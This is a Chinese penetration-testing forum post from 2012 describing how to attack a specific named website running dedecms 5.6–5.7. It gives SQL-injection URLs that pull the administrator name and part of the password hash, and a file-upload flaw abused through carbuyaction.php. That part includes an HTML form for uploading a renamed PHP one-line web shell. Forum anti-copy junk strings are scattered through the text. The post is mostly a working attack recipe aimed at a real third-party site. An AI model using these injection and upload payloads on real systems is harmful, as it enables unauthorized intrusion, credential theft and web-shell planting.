中国网络渗透测试联盟
标题:
dedecms5.6-5.7注入与上传漏洞利用
[打印本页]
作者:
admin
时间:
2012-9-13 10:56
标题:
dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
& O" D- r& r/ j* T: s& ^2 x4 D
这站
http://www.political-security.com/
; V1 n1 w7 S% n. A; O {0 h
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
5 }* U* B% U5 w! ?! Y/ v
www.political-security.com/data/mysql_error_trace.inc
爆后台
$ _) h3 u& y* f
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
+ M- M* |3 n% E
然后写上语句
+ G1 y" n) t9 Q/ \8 I7 _
查看管理员帐号
* o% ~6 P; @. N/ M
http://www.political-security.co ... &membergroup=@`
) f- T$ x9 \; F/ u. q
# y* h3 D: \: }/ i3 m& r5 v- @
admin
- ^1 h! b1 B6 @
2 i2 q2 m/ B; C. d" c
查看管理员密码
/ @: j& r# t1 \2 I* h
http://www.political-security.co ... &membergroup=@`
0 Z: V5 q1 F+ `* |' z2 \. K
* U) s, o8 a4 m# g
8d29b1ef9f8c5a5af429
( Z/ U4 Y' D. K% X
# |& m# @4 f: D' n% Y
查看管理员密码
8 y+ D* C3 Y& V8 h2 C+ w7 X
$ p* J: Q: ?5 j5 v2 A
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
5 }5 ~' k9 H8 T! n* j, n
7 ~; |) q$ D* e, M. y$ x
8d2
6 v. S; B7 v g2 ~
9b1ef9f8c5a5af42
& j7 D q) m; \) N6 Z
9
( ~8 w( l# I! o( ^6 F
. F: {, K& T. [0 B. M" p) m
cmd5没解出来 只好测试第二个方法
; H$ `$ e1 a3 E1 N% I: I. y3 Q
- j8 A8 v7 M4 _7 R+ [5 J* B
! P ?, ]) _1 Z5 ~! ?, {
②上传漏洞:
: ~2 G- F3 m7 X9 C4 K( d+ |* ]
7 @+ f( [$ O4 c7 v& g
只要登陆会员中心,然后访问页面链接
/ g6 v; z! ~* ]3 D6 f# E9 O
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
4 [! D& f: N2 C* c, Y! y% f
/ |- W1 ?4 d3 F& A* X2 N0 A
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
& n2 `% l. o" V$ |( u
, [9 R$ \. p, X: N( c1 M
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
! C$ O1 A2 I w- u
- ^! X" U+ |, j: o& C! M8 ]
<form action="http://
www.political-security.com
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
; H0 D7 `1 o. v: _( `* ]
或者
1 S# Y: ?- e$ D
即可上传成功
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2